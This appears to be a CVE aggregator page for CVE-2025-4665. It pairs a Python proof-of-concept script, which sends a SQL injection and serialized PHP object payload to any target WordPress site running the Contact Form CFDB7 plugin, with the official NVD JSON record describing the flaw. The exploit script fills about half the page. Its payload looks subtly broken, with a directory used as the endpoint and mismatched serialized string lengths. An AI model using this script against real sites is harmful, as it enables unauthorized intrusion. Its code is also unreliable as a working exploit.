CVE-2025-4665

import requests import sys # CVE-2025-4665 PoC - SQL Injection leading to PHP Object Injection # Target: WordPress plugin Contact Form CFDB7 <= 1.3.2 def exploit_sqli(target_url): """ SQL Injection payload to trigger insecure deserialization This PoC demonstrates the vulnerability in plugin endpoints """ # Target endpoint (typical CFDB7 endpoint) endpoint = f"{target_url}/wp-content/plugins/contact-form-cfdb7/" # Malicious payload for SQL injection # This payload attempts to inject serialized PHP object sql_payload = "' UNION SELECT 1,2,3,4,5,6,7,8---" # PHP Object Injection payload # O:6:"Example":2:{s:4:"data";s:10:";phpinfo();//";} object_payload = 'O:6:"Example":2:{s:4:"data";s:10:";phpinfo();//";}' # Construct the malicious request params = { 'cfdb7_function': 'get_records', 'data': sql_payload + object_payload } print(f"[*] Targeting: {target_url}") print(f"[*] Sending malicious payload...") try: response = requests.post(endpoint, data=params, timeout=10) print(f"[+] Response Status: {response.status_code}") if 'phpinfo' in response.text or 'example' in response.text.lower(): print("[!] Vulnerability confirmed - Object injection possible") return True else: print("[*] Response received - further analysis needed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] exploit_sqli(target)

{"cve": {"id": "CVE-2025-4665", "sourceIdentifier": "[email protected]", "published": "2025-10-29T00:15:34.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress plugin Contact Form CFDB7 versions up to and including 1.3.2 are affected by a pre-authentication SQL injection vulnerability that cascades into insecure deserialization (PHP Object Injection). The weakness arises due to insufficient validation of user input in plugin endpoints, allowing crafted input to influence backend queries in unexpected ways. Using specially crafted payloads, this can escalate into unsafe deserialization, enabling arbitrary object injection in PHP. Although the issue is remotely exploitable without authentication, it does require a crafted interaction with the affected endpoint in order to trigger successfully."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0006.md", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/contact-form-cfdb7", "source": "[email protected]"}]}}